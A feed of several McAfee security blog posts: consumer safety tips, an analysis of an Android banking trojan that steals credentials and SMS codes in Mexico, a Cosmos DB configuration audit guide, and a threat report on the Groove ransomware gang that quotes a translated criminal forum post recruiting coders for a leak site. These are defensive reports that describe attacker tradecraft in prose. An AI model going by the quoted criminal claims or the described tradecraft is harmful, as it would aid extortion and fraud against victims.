The attackers used a common dual use system utility, in this case Psexec.exe, to move laterally. In many cases, the malicious use of legitimate system tools is difficult to detect with signature-based detection only. MVISION EDR uses a combination of behaviour analytics and threat intelligence to proactively identify and flag a high severity alert on malicious use of Psexec for lateral movement.

Psexec.exe used for lateral movement:

Mapping User and Data Anomalies to Detect Exfiltration

The threat actors behind Operation Harvest utilized various tools to elevate privileges and exfiltrate data out of the impacted environment. Visualizing anomalies in user activity and data movement can be used to detect out of the ordinary behavior that can point to malicious activity going on in your environment. MVISION UCE will monitor user behavior and provide anomalies for the security team to pinpoint areas of concern for insider or external adversarial threats.

Identifying User Access Anomalies with UCE:

Identifying Data Transfer Anomalies with UCE:


MVISION Security Platform provides defense in depth to prevent, disrupt or detect many of the techniques used in Operation Harvest. As a network defender, focus on early prevention or detection of the techniques to better protect your organization against cyber-attacks.

The post McAfee Enterprise Defender’s Blog: Operation Harvest appeared first on McAfee Blogs.

Smartphone Security: Five Steps Beating and Blocking Robocalls Mon, 13 Sep 2021 13:41:19 +0000

Some scams can make a telltale sound—rinnng, rinnng! Yup, the dreaded robocall. Not only are they annoying, but they can also hit you in the pocketbook.   In the U.S., unwanted calls...

The post Smartphone Security: Five Steps Beating and Blocking Robocalls appeared first on McAfee Blogs.


Some scams can make a telltale sound—rinnng, rinnng! Yup, the dreaded robocall. Not only are they annoying, but they can also hit you in the pocketbook.  

In the U.S., unwanted calls rank as the top consumer complaint reported to the Federal Communications Commission (FCC), partly because scammers have made good use of spoofing technologies that serve up phony caller ID numbers. As a result, that innocent-looking phone number may not be innocent at all. 

Whether the voice on the other end of the smartphone is recorded or an actual person, the intent behind the call is likely the same—to scam you out of your personal information, money, or both. Callers such as these may impersonate banks, government agencies, insurance companies, along with any number of other organizations that give them an excuse to demand payment, financial information, or ID numbers. 

And some of those callers can sound rather convincing. Others, well, they’ll just get downright aggressive or threatening. One of the most effective tools these scam calls use is a sense of urgency and fear, telling you that there’s a problem right now and they need your information immediately to resolve whatever bogus issue they’ve come up with. That right there is a sign you should take pause and determine what’s really happening before responding or taking any action. 

Avoid and stop robocalls with these tips 

Whatever form these unwanted calls take, there are things you can do to protect yourself and even keep you from getting them in the first place. These five tips will get you started: 

1) Check your caller ID closely 

Okay, maybe you can file this one under “obviously.” Yet be aware that scammers excel at spoofing. They can make a call look like it’s local or just familiar enough. If you get caught off guard and answer a spammy call, hang up immediately. If you’re unsure about the number, you’re better off letting your voicemail screen the call for you. Picking up the phone to determine if a call is legit or not could help a scammer verify that you have a valid line, which could lead to more nuisance calls down the road.  

2) Don’t return calls from unknown numbers 

So, let’s say you let an unknown call go through to voicemail. The call sounds like it’s from a bank or business with news of an urgent matter. If you feel the need to follow up, get a legitimate customer service number from a statement, bill, or website of the bank or business in question so you can verify the situation for yourself. Calling back the number captured by your phone or left in voicemail could play right into the hands of a scammer. 

3) Don’t give in to pressure 

As you can see, scammers love to play the role of an imposter and will tell you there’s something wrong with your taxes, your account, or your bank statement. Some of them can be quite convincing, so if you find yourself in a conversation where you don’t feel comfortable with what’s being said or how it’s being said, hang up and follow up bank or business as called out above. In all, look out for pressure or scare tactics and keep your info to yourself.   

4) Sign up for your national do not call registry 

Several nations provide such a service, effectively a list that legitimate telemarketers will reference before making their calls. While this may not prevent scammers from ringing you up, it can cut down on unsolicited calls in general. For example, the U.S.Canada, and the UK each offer do not call registries. 

5) Look into apps and services that block unwanted calls

Many mobile carriers provide additional apps and services that can block unwanted calls, often as part of your smartphone’s service plan. There are third-party apps that do this as well. Yet do your research. You’ll want to see if those apps are legitimate and if they can effectively let “good” calls through without blocking them. 

Go a step further. Protect your smartphone with mobile security software or apps 

While security software and apps won’t block robocalls, they increase the security of your phone overall, which can protect both you and your data. You have a couple of options here. You can grab comprehensive security software that protects all of your devices or pick up an app in Google Play or Apple’s App Store. This way, you’ll have malware, web, and device security that’ll help you stay safe on your phone in general. 

Taken together, these steps can help you beat or outright block unwanted calls like robocalls—and be safer (and maybe less annoyed) as a result. 

The post Smartphone Security: Five Steps Beating and Blocking Robocalls appeared first on McAfee Blogs.

Android malware distributed in Mexico uses Covid-19 to steal financial credentials Mon, 13 Sep 2021 12:27:31 +0000

Authored by Fernando Ruiz McAfee Mobile Malware Research Team has identified malware targeting Mexico. It poses as a security banking tool or as a bank...

The post Android malware distributed in Mexico uses Covid-19 to steal financial credentials appeared first on McAfee Blogs.


Authored by Fernando Ruiz

McAfee Mobile Malware Research Team has identified malware targeting Mexico. It poses as a security banking tool or as a bank application designed to report an out-of-service ATM. In both instances, the malware relies on the sense of urgency created by tools designed to prevent fraud to encourage targets to use them. This malware can steal authentication factors crucial to accessing accounts from their victims on the targeted financial institutions in Mexico. 

McAfee Mobile Security is identifying this threat as Android/Banker.BT along with its variants. 

How does this malware spread? 

The malware is distributed by a malicious phishing page that provides actual banking security tips (copied from the original bank site) and recommends downloading the malicious apps as a security tool or as an app to report out-of-service ATM. It’s very likely that a smishing campaign is associated with this threat as part of the distribution method or it’s also possible that victims may be contacted directly by scam phone calls made by the criminals, a common occurrence in Latin America. Fortunately, this threat has not been identified on Google Play yet. 

Here’s how to protect yourself 

During the pandemic, banks adopted new ways to interact with their clients. These rapid changes meant customers were more willing to accept new procedures and to install new apps as part of the ‘new normal’ to interact remotely. Seeing this, cyber-criminals introduced new scams and phishing attacks that looked more credible than those in the past leaving customers more susceptible. 

Fortunately, McAfee Mobile Security is able to detect this new threat as Android/Banker.BT. To protect yourself from this and similar threats: 

  • Employ security software on your mobile devices  
  • Think twice before downloading and installing suspicious apps especially if they request SMS or Notification listener permissions. 
  • Use official app stores however never trust them blindly as malware may be distributed on these stores too so check for permissions, read reviews and seek out developer information if available. 
  • Use token based second authentication factor apps (hardware or software) over SMS message authentication 

Interested in the details? Here’s a deep dive on this malware 

Figure 1- Phishing malware distribution site that provides security tips
Figure 1- Phishing malware distribution site that provides security tips

Behavior: Carefully guiding the victim to provide their credentials 

Once the malicious app is installed and started, the first activity shows a message in Spanish that explains the fake purpose of the app: 

– Fake Tool to report fraudulent movements that creates a sense of urgency: 

Figure 2- Malicious app introduction that try to lure users to provide their bank credentials
Figure 2- Malicious app introduction that tries to lure users to provide their bank credentials\

“The ‘bank name has created a tool to allow you to block any suspicious movement. All operations listed on the app are still pending. If you fail to block the unrecognized movements in less than 24 hours, then they will charge your account automatically. 

At the end of the blocking process, you will receive an SMS message with the details of the blocked operations.” 

– In the case of the Fake ATM failure tool to request a new credit card under the pandemic context, there is a similar text that lures users into a false sense of security: 

Figure 3- Malicious app introduction of ATM reporting variant that uses the Covid-19 pandemic as pretext to lure users into provide their bank credentials
Figure 3- Malicious app introduction of ATM reporting variant that uses the Covid-19 pandemic as a pretext to lure users into providing their bank credentials

“As a Covid-19 sanitary measure, this new option has been created. You will receive an ID via SMS for your report and then you can request your new card at any branch or receive it at your registered home address for free. Alert! We will never request your sensitive data such as NIP or CVV.”This gives credibility to the app since it’s saying it will not ask for some sensitive data; however, it will ask for web banking credentials. 

If the victims tap on “Ingresar” (“access”) then the banking trojan asks for SMS permissions and launch activity to enter the user id or account number and then the password. In the background, the password or ‘clave’ is transmitted to the criminal’s server without verifying if the provided credentials are valid or being redirected to the original bank site as many others banking trojan does. 

Figure 4- snippet of user entered password exfiltration
Figure 4- snippet of user-entered password exfiltration

Finally, a fixed fake list of transactions is displayed so the user can take the action of blocking them as part of the scam however at this point the crooks already have the victim’s login data and access to their device SMS messages so they are capable to steal the second authentication factor. 

Figure 5- Fake list of fraudulent transactions
Figure 5- Fake list of fraudulent transactions

In case of the fake tool app to request a new card, the app shows a message that says at the end “We have created this Covid-19 sanitary measure and we invite you to visit our anti-fraud tips where you will learn how to protect your account”.  

Figure 6- Final view after the malware already obtained bank credentials reinforcing the concept that this application is a tool created under the covid-19 context.
Figure 6- Final view after the malware already obtained bank credentials reinforcing the concept that this application is a tool created under the covid-19 context.

In the background the malware contacts the command-and-control server that is hosted in the same domain used for distribution and it sends the user credentials and all users SMS messages over HTTPS as query parameters (as part of the URL) which can lead to the sensitive data to be stored in web server logs and not only the final attacker destination. Usually, malware of this type has poor handling of the stolen data, therefore, it’s not surprising if this information is leaked or compromised by other criminal groups which makes this type of threat even riskier for the victims. Actually, in figure 8 there is a partial screenshot of an exposed page that contains the structure to display the stolen data. 

Figure 7 - Malicious method related to exfiltration of all SMS Messages from the victim's device.
Figure 7 – Malicious method related to exfiltration of all SMS Messages from the victim’s device.

Table Headers: Date, From, Body Message, User, Password, Id: 

Figure 8 – Exposed page in the C2 that contains a table to display SMS messages captured from the infected devices.
Figure 8 – Exposed page in the C2 that contains a table to display SMS messages captured from the infected devices.

This mobile banker is interesting due it’s a scam developed from scratch that is not linked to well-known and more powerful banking trojan frameworks that are commercialized in the black market between cyber-criminals. This is clearly a local development that may evolve in the future in a more serious threat since the decompiled code shows accessibility services class is present but not implemented which leads to thinking that the malware authors are trying to emulate the malicious behavior of more mature malware families. From the self-evasion perspective, the malware does not offer any technique to avoid analysis, detection, or decompiling that is signal it’s in an early stage of development. 



  • 84df7daec93348f66608d6fe2ce262b7130520846da302240665b3b63b9464f9 
  • b946bc9647ccc3e5cfd88ab41887e58dc40850a6907df6bb81d18ef0cb340997 
  • 3f773e93991c0a4dd3b8af17f653a62f167ebad218ad962b9a4780cb99b1b7e2 
  • 1deedb90ff3756996f14ddf93800cd8c41a927c36ac15fcd186f8952ffd07ee0 


  • https[://] 

The post Android malware distributed in Mexico uses Covid-19 to steal financial credentials appeared first on McAfee Blogs.

Before You Download: Steer Clear of Malicious Mobile Apps Fri, 10 Sep 2021 22:26:28 +0000

Cybercriminals like to get in on a good thing. Case in point, mobile apps. We love using apps and they love making bogus ones—malicious apps designed to harm phones and possibly the person using them.  ...

The post Before You Download: Steer Clear of Malicious Mobile Apps appeared first on McAfee Blogs.


Cybercriminals like to get in on a good thing. Case in point, mobile apps. We love using apps and they love making bogus ones—malicious apps designed to harm phones and possibly the person using them.  

It’s no wonder that they target smartphones. They’re loaded with personal info and photos, in addition to credentials for banking and payment apps, all of which are valuable to loot or hold for ransom. Add in other powerful smartphone features like cameras, microphones, and GPS, and a compromised phone may allow a hacker to: 

  • Snoop on your current location and everyday travels. 
  • Hijack your passwords to social media, shopping, and financial accounts.
  • Drain your wallet by racking up app store purchases or tapping into payment apps.
  • Read your text messages or steal your photos. 

All of that adds up to one thing—a great, big “no thanks!” 

So how do these malicious apps work? By posing as legitimate apps, they can end up on your phone and gain broad, powerful permissions to files, photos, and functionality—or sneak in code that allows cybercriminals to gather personal info. As a result, that can lead to all kinds of headaches, ranging from a plague of popup ads to costly identity theft. 

Here are a few recent examples of malicious apps in the news:  

  • Fake ad blocking programs that ironically serve up ads instead. 
  • Phony VPN apps that charge a subscription and offer no protection in return. 
  • Utility apps that hijack system privileges and permissions, which expose users to further attacks. 

Again, “no thanks!” So, let’s see about steering clear of malicious apps like these. 

Six steps to safer mobile app downloads 

The good news is that there are ways you can spot these imposters. Major app marketplaces like Google Play and Apple’s App Store do their part to keep their virtual shelves free of malware, as reported by Google and Apple themselves. Still, cybercriminals can find ways around these efforts. (That’s what they do, after all!) So, a little extra precaution on your part will help you stay safer. These six steps can help: 

1) Avoid third-party app stores

Unlike Google Play and Apple’s App Store, which have measures in place to review and vet apps to help ensure that they are safe and secure, third-party sites may not have that process in place. In fact, some third-party sites may intentionally host malicious apps as part of a broader scam. Granted, cybercriminals have found ways to work around Google and Apple’s review process, yet the chances of downloading a safe app from them are far greater than anywhere else. Furthermore, both Google and Apple are quick to remove malicious apps once discovered, making their stores that much safer. 

2) Review with a critical eye

As with so many attacks, cybercriminals rely on people clicking links or tapping “download” without a second thought. Before you download, take time to do some quick research, which may uncover a few signs that the app is malicious. Check out the developer—have they published several other apps with many downloads and good reviews? A legit app typically has quite a few reviews, whereas malicious apps may have only a handful of (phony) five-star reviews. Lastly, look for typos and poor grammar in both the app description and screenshots. They could be a sign that a hacker slapped the app together and quickly deployed it. 

Examples of Google Play and Apple App Store entries that list the name of the developer. 

3) Go with a strong recommendation 

Even better than combing through user reviews yourself is getting a recommendation from a trusted source, like a well-known publication or from app store editors. In this case, much of the vetting work has been done for you by an established reviewer. A quick online search like “best fitness apps” or “best apps for travelers” should turn up articles from legitimate sites that can suggest good options and describe them in detail before you download. 

4) Keep an eye on app permissions 

Another way cybercriminals weasel their way into your device is by getting permissions to access things like your location, contacts, and photos—and they’ll use sketchy apps to do it. (Consider the long-running free flashlight app scams mentioned above that requested up to more than 70 different permissions, such as the right to record audio, video, and access contacts.) So, pay close attention to what permissions the app is requesting when you’re installing it. If it’s asking for way more than you bargained for, like a simple game wanting access to your camera or microphone, it may be a scam. Delete the app and find a legitimate one that doesn’t ask for invasive permissions like that.  

Previewing app permissions in the App Store and Google Play. 

Additionally, you can check to see what permissions an app may request before downloading the app. In Google Play, scroll down the app listing and find “About this app.” From there, click “App permissions,” which will provide you with an informative list. In the iOS App Store, scroll down to “App Privacy” and tap “See Details” for a similar list. If you’re curious about permissions for apps that are already on your phone, iPhone users can learn how to allow or revoke app permissions here, and Android can do the same here. 

5) Protect your smartphone with security software 

With all that we do on our phones, it’s important to get security software installed on them, just like we do on our computers and laptops. Whether you go with comprehensive security software that protects all of your devices or pick up an app in Google Play or Apple’s iOS App Store, you’ll have malware, web, and device security that’ll help you stay safe on your phone.  

6) Update your phone’s operating system 

Hand-in-hand with installing security software is keeping your phone’s operating system up to date. Updates can fix vulnerabilities that cybercriminals rely on to pull off their malware-based attacks—it’s another tried and true method of keeping yourself safe and your phone running in tip-top shape. 

Stay on guard against mobile malware 

Here are a few more things you can do:  

  • Keep tabs on your accounts. With any kind of scam or identity theft, it’s likely going to leave a record in your statements or payment and banking apps. If you spot something fishy there, follow up and report it.  
  • Consider checking your credit report for signs of fraud as part of your overall security measures. It may uncover identity theft-related transactions that you were entirely unaware of, such as someone renting an apartment in your name. 

Lastly, you can always ask yourself, “Do I really need this app?” One way to avoid malicious mobile apps is to download fewer apps overall. If you’re unsure if that free game is on the up-and-up or if the offer for that productivity app sounds a little too good, skip it. Look for a better option or pass on the idea altogether. As said earlier, cybercriminals really rely on us clicking and downloading without thinking. Staying on guard against mobile malware will cost you a few moments of your time, which is minimal compared to the potential costs of a hacked phone. 

The post Before You Download: Steer Clear of Malicious Mobile Apps appeared first on McAfee Blogs.

How to Talk to Your Grandparents About Cybersecurity Fri, 10 Sep 2021 00:09:34 +0000 How to Talk to Your Grandparents About Cybersecurity

According to research from the FBI and FTC, cybercrimes against older adults cost more than $650 million in losses each year. Why? Unlike millennials and Generation Z,...

The post How to Talk to Your Grandparents About Cybersecurity appeared first on McAfee Blogs.

How to Talk to Your Grandparents About Cybersecurity

According to research from the FBI and FTC, cybercrimes against older adults cost more than $650 million in losses each year. Why? Unlike millennials and Generation Z, your grandparents weren’t born with a smartphone in their hands. On top of that, older adults tend to have more significant financial funds like retirement accounts, making them an ideal target for cybercriminals.  

With Grandparent’s Day right around the corner, here’s a guide on how you can help keep your grandparents safe from the most common cybercrimes on the internet. Check out our top tips to share with your family to boost their confidence in their digital activities.  

1. Talk About the Latest Online Scams  

Cybercriminals constantly update their techniques to increase their chances of successfully stealing consumers’ data. Oftentimes, they lean on current events to create eye-catching subject lines for phishing emails, malicious links and attachments, and more. For example, criminals created COVID-19 phishing campaigns related to proof of vaccination or the surging delta variant since they know the pandemic is top-of-mind for many consumers. Encourage your grandparents to keep an eye on the news for the latest online scams so they have a better chance of recognizing fraudulent activity. Or better yet, send them a weekly digest of relevant consumer security news or call them when you come across a common scam.  Remind them that knowledge is power in online security.  

2. Show Them How to Think Like a Cybercriminal 

The secret to beating cybercriminals at their own game is to think like one. Look at your online behaviors and your data from their perspective. Encourage your grandparents to consider what would make themselves ideal targets. Perhaps they have large retirement funds. If their online bank account is secured with a password that they use for multiple online accounts, they’ve made it that much easier for a hacker to access their financial data if their credentials are exposed in a breach.  

Teaching your grandparents and other family members how to think like a cybercriminal can reveal possible points of entry and identify where they can tighten up their security to protect their devices and information from online threats.  

3. Explain Cybersecurity Best Practices 

With multiple layers of protection in place, your grandparents can navigate the internet more confidently. Here are a few easy cyber habits you can pass on to your grandparents:  

  • Use strong, unique passwords. Many people use the same password, or variations of it, across all of their accounts. This means if a cybercriminal discovers just one password, more personal data is suddenly at risk. Therefore, diversify your passcodes to ensure criminals cannot obtain access to all of your accounts at once, should one password be compromised. You can also use a password manager to keep track of your different credentials.  
  • Turn on multi-factor authentication. Multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification, such as a finger scan or facial recognition. This reduces the risk of successful impersonation by cybercriminals.  
  • Ignore suspicious emails, text messages, and phone calls. Criminals often use phishing emails or text messages to distribute and disguise their malicious code. Do not open suspicious or irrelevant messages, as this can result in malware infection. Be especially wary if written messages have several typos. Reputable businesses and financial institutions always proofread their correspondence. Finally, phishing emails, texts, and calls often urge recipients to act quickly. Remain calm and carefully evaluate if the content of the message seems suspicious.   
  • Go directly to the source. If you receive an email that appears to be from a business or even a family member, but they are asking you for your Social Security Number, passwords, or money, stop and think. Don’t click on anything or take any direct action from the message. Instead, go straight to the organization’s website and verify that the message is legitimate with customer service. If the message claims to be from a family member asking for financial help, contact them directly to ensure it’s not a scammer in disguise.  

4. Teach Your Grandparents How to Report Cybercrimes 

 The next step to a confident digital life is reporting fraud. Let your grandparents know that even if the fraud attempt was unsuccessful, they should report the incident.  Any consumer can report online scams at the FBI’s IC3 website. Credit, debit, or bank account fraud should be immediately reported to your bank, as well.  

5. Help Them Install Comprehensive Security Software  

Use a solution like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, a tool that identifies malicious websites, and identity theft protection. Having a security solution in place can help provide greater peace of mind so you and your family can live a more confident digital life.  

The post How to Talk to Your Grandparents About Cybersecurity appeared first on McAfee Blogs.

How MVISION CNAPP Helps Protect Against ChaosDB Thu, 09 Sep 2021 15:00:39 +0000

Attackers have made it known that Microsoft is clearly in their cross hairs when it comes to potential targets. Just...

The post How MVISION CNAPP Helps Protect Against ChaosDB appeared first on McAfee Blogs.


Attackers have made it known that Microsoft is clearly in their cross hairs when it comes to potential targets. Just last month the US Justice Department disclosed that Solorigate continues to comprise security when they confirmed over 80% of Microsoft email accounts were breached across four different federal prosecutors offices. In August Microsoft released another security patch (the second of two) for PrintNightmare, which allows remote attackers system level escalation of all Windows clients and servers. Since Microsoft still has the dominate market share for desktop OS, email/office services, along with the second largest market share in cloud computing, any security vulnerability found within the Microsoft ecosystem has cascading effects across the board.

Based on this, we wanted to let our customers know our response to the latest Microsoft security vulnerability. On August 12, Microsoft confirmed a security vulnerability dubbed ChaosDB whereby attackers can download, delete, or modify all data stored within the Azure Cosmos DB service. In response to the vulnerability Microsoft has since disabled the feature that can be exploited and notified potentially affected customers. However, according to the research team that identified the vulnerability they believe the actual number of customers affected is much higher and has the potential to expose thousands of companies dating back to 2019.

Cosmos DB is Microsoft’s fully managed NoSQL database service hosted on Azure which boasts customers such as Mars, Mercedes Benz, and Chipotle. The ChaosDB vulnerability affects customers that use the Jupyter Notebook feature. This built-in feature allows customers to share data visualizations and narrative text based on the data stored in Cosmos DB. Unfortunately, the Jupyter Notebook feature has been enabled by default for customers since February 2021, and fixing the vulnerability is no easy task. Because the vulnerability exposes public keys that can be used to access other Cosmos databases, the resolution requires that customers manually rotate their Cosmos DB primary keys – which are typically long-lived keys and used across multiple services or applications.

For customers using Cosmos DB, we highly recommend following Microsoft’s guidance and rotate their keys, but we also recognize that business can’t stop and unless you’ve automated key rotation, that task may take time and coordination across multiple teams. This blog will help provide some assistance on how one of our newest services can help identify and mitigate ChaosDB.

MVISION Cloud Native Application Protection Platform (CNAPP) is a new service we launched this year that provides complete visibility and security into services and applications built on top of cloud native solutions. MVISION CNAPP helps customers secure the underlying platform like Amazon Web Services (AWS), Microsoft Azure, and Google Cloud used to build applications but also provides complete build and runtime protection for applications using virtual machines, Docker, and Kubernetes.

As part of this service, MVISION CNAPP has a feature called the custom policy builder. The custom policy builder is a great way for customers to audit services across their entire cloud environment in real time to identify risky configurations but can also be used to curate a specific policy to the customer’s unique environment based on several API properties.

How does the custom policy builder work? Once MVISION CNAPP is connected to a customer’s AWS, Azure, or GCP account, the custom policy builder will list all the supported services within each cloud platform. Along with all the supported services, the custom policy builder will also list all the available API attributes for each of those services – attributes that customers can use as triggers for creating security incidents and automatic responses. A good example of the capability would be “if MVISION CNAPP identifies a public Amazon S3 bucket, performs a scan to on the bucket objects to identify any sensitive data and alerts teams via a SNS notification.” When new vulnerabilities like ChaosDB hit the wire, the custom policy builder is purpose built to help customers identify and understand their risk to anything new.

So how can CNAPP help identify if you’re at risk for ChaosDB? Essentially, you’ll want to answer three questions to understand your risk:

  • Are we using Cosmos DB?
  • If so, do our Cosmos databases have unrestricted access?
  • If an attacker did have access to our Cosmos DB keys, what level of access would they have with those keys?

To find answers to these questions, I’ll show how you can create several custom policies using the MVISION CNAPP custom policy builder, but you can combine and mix these rules based on your needs.

In the first example, I’m going to answer the first two questions to see if we’re running Cosmos DB and if the service has unrestricted network access. Under the MVISION CNAPP menu I’ll click on Policy | Configuration Audit | Actions | Create Policy. From there I’ll give my policy a name and select Microsoft Azure | Next. The custom policy builder will automatically prepopulate all the available services in Azure when I click on Select Resource Type. Select Azure Cosmos DB and the custom policy builder will now show me all the available API attributes for that service. Start typing for the string of properties.publicNetworkAccess with a statement of equals to Enabled with a severity level you assign. Click Test Rule and the custom policy builder will check if you’re running any Cosmos DBs that allow access from any source.

Figure 1: Custom Policy Builder Screenshot

If the results of the custom policy show any incidents where Cosmos DB has unrestricted access, you’ll want to immediately change that setting by Configuring an IP firewall in Azure Cosmos DB.

Now let’s see if we have any Cosmos databases where we haven’t set firewall rules. These rules can be based on a set of IP addresses or private end points and should have been set when you created the DBs, but let’s confirm. You’ll follow the same steps as before but select the following criteria for the policy using AND statements:

  • ipRangeFilter equals to not set
  • virtualNetworksRules is not set
  • privateEndpointConnections is not set

Figure 2: Custom Policy Builder Screenshot 2

If you see any results from the custom policy, you’ll want to review the IP address and endpoints to make sure you’re familiar with access from those sources. If you’re not familiar with those sources or the sources are too broad, follow Configuring an IP firewall in Azure Cosmos DB to make the necessary changes.

Finally, let’s show how MVISION CNAPP can audit to see what is possible if your keys were exposed. In general, database keys are issued out to applications so they can access data. Rarely would you issue keys to make configuration changes or write changes to your database services. If you granted keys that can make changes, you may have issued an overly permissive key. Eventually you’ll want to regenerate those keys, but in the meantime let’s identify if the keys can make write changes.

We’ll follow the same procedure as before but use the properties.disableKeyBasedMetadataWriteAccess equals to false

Figure 3: Custom Policy Builder Screenshot 3

Like in the previous examples, if you find any results here that show you’ve issued keys that can make write changes, you’ll want to disable the feature by following Disable key based metadata write access.

Our custom policy builder is just one of the many features we’ve introduced with MVISION CNAPP. I invite you to check out the solution by visiting for more information or request a demo at

The post How MVISION CNAPP Helps Protect Against ChaosDB appeared first on McAfee Blogs.

How Groove Gang is Shaking up the Ransomware-as-a-Service Market to Empower Affiliates Thu, 09 Sep 2021 04:01:34 +0000

Co-authored with Intel471 and McAfee Enterprise Advanced Threat Research (ATR) would also like to thank Coveware for its contribution. Executive...

The post How Groove Gang is Shaking up the Ransomware-as-a-Service Market to Empower Affiliates appeared first on McAfee Blogs.


Co-authored with Intel471 and McAfee Enterprise Advanced Threat Research (ATR) would also like to thank Coveware for its contribution.

Executive Summary

McAfee Enterprise ATR believes, with high confidence, that the Groove gang is associated with the Babuk gang, either as a former affiliate or subgroup. These cybercriminals are happy to put aside previous Ransomware-as-a-Service hierarchies to focus on the ill-gotten gains to be made from controlling victim’s networks, rather than the previous approach which prioritized control of the ransomware itself.


For many years the world of Ransomware-as-a-Service (RaaS) was perceived as a somewhat hierarchical and structured organization. Ransomware developers would advertise their RaaS program on forums and gracefully open up slots for affiliates to join their team to commit crime. The RaaS admins would conduct interviews with potential affiliates to make sure they were skilled enough to participate. Historically, i.e., with CTB locker, the emphasis was on affiliates generating enough installs via a botnet, exploit kits or stolen credentials, but it has shifted in recent years to being able to penetrate and compromise a complete network using a variety of malicious and non-malicious tools. This essentially changed the typical affiliate profile towards a highly-skilled pen-tester/sysadmin.

Figure 1. Recruitment posting for CTB locker from 2014

Figure 2. Recruitment posting for REvil from 2020

Experts often describe the hierarchy of a conventional organized crime group as a pyramid structure. Historically, La Cosa Nostra, drug cartels and outlaw motor gangs were organized in such a fashion. However, due to further professionalization and specialization of the logistics involved with committing crime, groups have evolved into more opportunistic network-based groups that will work together more fluidly, according to their current needs.

While criminals collaborating in the world of cybercrime isn’t a novel concept, a RaaS group’s hierarchy is more rigid compared to other forms of cybercrime, due to the power imbalance between the group’s developers/admins and affiliates.

For a long time, RaaS admins and developers were prioritized as the top targets, often neglecting the affiliates since they were perceived as less-skilled. This, combined with the lack of disruptions in the RaaS ecosystem, created an atmosphere where those lesser-skilled affiliates could thrive and grow into very competent cybercriminals.

However, this growth isn’t without consequences. Recently we have observed certain events that might be the beginning of a new chapter in the RaaS ecosystem.

Cracks in the RaaS model

Trust in the cybercriminal underground is based on a few things, such as keeping your word and paying people what they deserve. Just like with legitimate jobs, when employees feel their contributions aren’t adequately rewarded, those people start causing friction within the organization. Ransomware has been generating billions of dollars in recent years and with revenue like that, it’s only a matter of time before some individuals who believe they aren’t getting their fair share become unhappy.

Recently, a former Conti affiliate was unhappy with their financial portion and decided to disclose the complete Conti attack playbook and their Cobalt Strike infrastructure online, as shown in the screenshot below.

Figure 3. Disgruntled Conti affiliate

In the past, ATR has been approached by individuals affiliated with certain RaaS groups expressing grudges with other RaaS members and admins, claiming they haven’t been paid in time or that their share wasn’t proportionate to the amount of work they put in.

Recently, security researcher Fabian Wosar opened a dedicated Jabber account for disgruntled cybercriminals to reach out anonymously and he stated that there was a high level of response.

Figure 4. Jabber group for unhappy threat actors

Moreover, the popular cybercrime forums have banned ransomware actors from advertising since the Colonial Pipeline attack. Now, the groups no longer have a platform on which to actively recruit, show their seniority, offer escrow, have their binaries tested by moderators, or settle disputes. The lack of visibility has made it harder for RaaS groups to establish or maintain credibility and will make it harder for RaaS developers to maintain their current top tier position in the underground.

Paying respects…. RAMP Forum and Orange

After a turbulent shutdown of Babuk and the fallout from the Colonial Pipeline and Kaseya attacks, it seems that some of the ransomware-affiliated cybercriminals have found a home in a forum known as RAMP.

Figure 5. RAMP posting by Orange, introducing Groove and explaining relationships

Translated Posting

When analyzing RAMP and looking at the posting above from the main admin Orange, it’s hard to ignore numerous references that are made: From the names chosen, to the avatar of Orange’s profile, which happens to be a picture of a legitimate cyber threat intelligence professional.


Hello, friends! I am happy to announce the first contest on Ramp.

Let’s make it clear that we don’t do anything without a reason, so at the end of the day, it’s us who will benefit most from this contest 🙂

Here’s the thing: besides my new projects and old, I have always had this unit called

GROOVE — I’ve never revealed its name before and it’s never been mentioned directly in the media, but it does exist — we’re like Mossad (we are few and aren’t hiring). It’s Groove whom the babuk ransomware needs to thank for its fame.

Groove rocks, and babuk stinks 🙂

Challenge: Using a PHP stack+MYSQL+Bootstrap, code a standard ransomware operators’ blog in THE RUSSIAN LANGUAGE with the following pages:

1) About us

The description of a group, which must be editable from the admin panel and use the same visual editor as our forum.

2) Leaks.

No hidden blogs, just leaks.

Use standard display, just like other ransomware operators’ blogs do.

3) News

A news page; it must be possible to add and edit news via the admin panel.

We’ll be accepting your submissions up to and including August 30.

Who will rate the entries and how?

There will be only one winner. I, Orange, will rate the usability and design of blogs. MRT will rate each entry’s source code and its security. In addition to USD 1k, the winner will most likely get a job in the RAMP team!

Now, for those of you who are interested in entirely different things:

1) No, we are not with the Kazakh intelligence agency.–livres-blancs/cybersecchronicles_-_babuk.pdf

2) Groove has never had a ransomware product, nor will that ever change.

3) The babuk team doesn’t exist. We rented the ransomware from a coder who could not shoulder the responsibility, got too scared and decided to leave an error in the ESX builder — naturally, to give us a reason to chuck him out (his motives? Fxxx if I know)

babuk 2.0, which hit the headlines, is not to be taken seriously and must be regarded as nothing but a very stupid joke

4) GROOVE is first and foremost an aggressive financially motivated criminal organization dealing in industrial espionage for about two years. RANSOMWARE is no more than an additional source of income. We don’t care who we work with and how. You’ve got money? We’re in

RAMP Ransom Anon Mark[et] Place

RAMP was created in July 2021 by a threat actor TetyaSluha, who later changed their moniker to ‘Orange.’ This actor claimed the forum would specifically cater to other ransomware-related threat actors after they were ousted from major cybercrime forums for being too toxic, following the high-profile ransomware attacks against the Colonial Pipeline and Washington D.C.’s Metropolitan Police Department in the spring of 2021.

At the time of the initial launch, Orange claimed the forum’s name was a tribute to a now-defunct Russian-language underground drug marketplace, “Russian Anonymous Marketplace,” which was taken down by Russian law enforcement agencies in 2017.  The re-launched cybercrime forum’s name now supposedly stands for “Ransom Anon Mark[et] Place”.

The forum was initially launched on the same TOR-based resource that previously hosted a name-and-shame blog operated by the Babuk ransomware gang and the Payload.bin marketplace of leaked corporate data. The forum was later moved to a dedicated TOR-based resource and relaunched with a new layout and a revamped administrative team, where Orange acted as the admin, with other known actors MRT, 999 and KAJIT serving as moderators.

Why the name Orange?

Why the admin changed handles from TetyaSluha to Orange isn’t 100 percent clear. However, looking back, the early days of RAMP provides us some evidence on who this person has been affiliated with. We found a posting from  where the names Orange and Darkside are mentioned as potential monikers. Very shortly after that, TetyaSluha changed their handle to Orange. While the initial message has been removed from the forum itself, the content was saved thanks to Intel 471.

July 12th 2021 by Mnemo

Congratulations on the successful beginning of struggle for the right to choose and not to be evicted. I hope, the community will soon fill with reasonable individuals.

Oh yeah, you’ve unexpectedly reminded everyone about the wonderful RAMP forum. Are the handles Orange and Darkside still free?

